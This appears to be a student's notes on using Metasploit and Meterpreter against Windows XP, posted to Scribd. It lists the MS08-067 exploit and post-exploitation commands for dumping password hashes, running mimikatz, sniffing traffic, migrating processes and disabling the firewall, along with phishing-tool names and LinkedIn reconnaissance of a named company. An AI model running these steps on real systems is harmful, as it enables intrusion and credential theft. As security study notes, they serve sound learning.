KEMBAR78
Meterpreter | PDF
Scribd
Upload
11 views3 pages

Meterpreter

Uploaded by

ahmedemademad19
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
11 views3 pages

Meterpreter

Uploaded by

ahmedemademad19
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

site:linkedin.

com swissccom ltd

rubberduky
evilgnix

deepsea email sender

-----------------------------------------
Shell Types:

difference between bind and reverse tcp

Bind TCP: Victim opens a port and waits for the attacker to connect.
Reverse TCP: Victim connects back to the attacker’s machine, which is waiting for
the connection.
and can bypass firewall

stage payload => send the payload in many stages and parts => bypass the firewall
stageless payload => send the payload in one shoot one time

can enable firewall and disable it in both bind and reverse connection

exploit/windows/smb/ms08_067_netapi

grep shell show payloads s

set payload windows/shell/ => double tab

after attack run


cmd> netsat -ano
cmd> tasklist /v
cmd>qwinsta => know life sessions

---------------------------------------
Meterpreter
exploit windows xp

exploit/windows/smb/ms08_067_netapi

grep meterpreter show payloads

after connection
sessions -i 1
>ps
>getuid
>dir
>systeminfo
---------------------
migrate to another service
migrate <service_id> => spoolsv.exe => Print Spooler Service.

---------------------
we can download
# download file.txt
# pwd -> for victim path
# lpwd -> for attacker path

=> to convert the meterpreter to cmd command line


> shell

to make the session go to the background then


> background

msf> sessions
msf> sessions -i <id>

to get all passwords hash


> hashdump

> ?

to execute commands
> execute -f cmd.exe

can take screenshot


> screenshot

can load modules for post explotation

meterpreter> load => double tab

meterpreter> load mimikatz


meterpreter> ?
meterpreter> kerberos

search in offensive security for mimikatz

meterpreter> load sniffer


meterpreter> ?
meterpreter> sniffer_interfaces

meterpreter> sniffer_start <interface_id>

then make ping over the xp

meterpreter> sniffer_stats 1
meterpreter> sniffer_dump 1 /home/kali/hack.pcap
meterpreter> load espia => for screen shots
meterperter> screengrab

---------------------------------------

Stop Firewall
meterpreter> shell
system32> netsh firewall set opmode mode=DISABLE
system32> netsh firewall set opmode mode=ENABLE

You might also like